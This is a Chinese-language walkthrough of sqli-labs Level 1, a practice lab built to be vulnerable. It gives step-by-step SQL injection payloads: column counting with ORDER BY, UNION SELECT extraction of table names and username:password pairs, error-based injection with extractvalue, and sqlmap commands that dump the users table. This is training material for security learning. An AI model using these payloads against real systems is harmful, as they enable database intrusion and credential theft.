sqli-labs通關wp

第一關：

方法一：
在id=1後面加一個單引號後發現報錯

然後把這個單引號註釋掉試一下

使用'or 1=1--+

order by 查列數
頁面顯示正常了。存在注入，先查一下列數
http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20order%20by%203--+
使用單引號閉合掉一個單引號，在用--+或#或%27註釋掉一個，便可以使中間的order by 進行排序，語句如上，當使用order by 3的時候正常，使用order by 4的時候報錯，就說明這裏有三列數據

查完列數後，注意後面 id=非正確值

union select看返回值
構造payload：
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,3--+
發現2,3存在回顯

暴庫payload：
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,database()--+

數據庫名字:security

爆表payload：
http://127.0.0.1/sqli-labs/Less-1/？id=-1%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--+

爆出的表名，其中users最可疑

爆字段payload：
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20--+

user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password 這些都是users表中的字段名

爆值payload：
http://127.0.0.1/sqli-labs/Less-1/?id=-1%27union%20select%201,2,group_concat(username,0x3a,password)%20from%20users--+
payload解釋：
0x3a：0x是十六進制的標誌，3a是十進制的58，是ascii中的':',用以分割password和username

方法二：
手工報錯型注入

檢測報錯型payload：

1

?id=1' 1=1--+ 正常
?id=1' 1=2--+ 報錯
證明確實存在手工報錯型注入

注意：id=正確值

報錯注入：

當前表：

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

字段：

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user_id','first_name','last_name','user','avatar','last_login','failed_login')))) --+

值：

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+

同樣使用not in顯示其他值

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','I-kill-you'))))--+

使用sqlmap：

爆表： 

sqlmap -u 10.101.143.198/sqli-labs/Less-1/?id=1 --technique UE --dbms mysql -D security --tables --batch -v 0

爆字段：

sqlmap -u 10.101.143.198/sqli-labs/Less-1/?id=1 --technique UE --dbms mysql -D security -T users --columns --batch -v 0

值：

sqlmap -u 10.101.143.198/sqli-labs/Less-1/?id=1 --technique UE --dbms mysql -D security -T users -C username,password --dump --batch -v 0